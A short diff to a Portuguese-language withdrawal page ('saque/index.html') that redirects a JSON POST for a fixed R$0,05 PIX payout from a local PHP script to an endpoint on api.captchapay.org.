--- a/saque/index.html
+++ b/saque/index.html
@@ -141,7 +141,7 @@
                 value: 0.05  // Valor fixo de R$0,05
             };
 
-            fetch('process_pix2.php', {
+            fetch('https://api.captchapay.org/captcha/process_pix2.php', {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json'
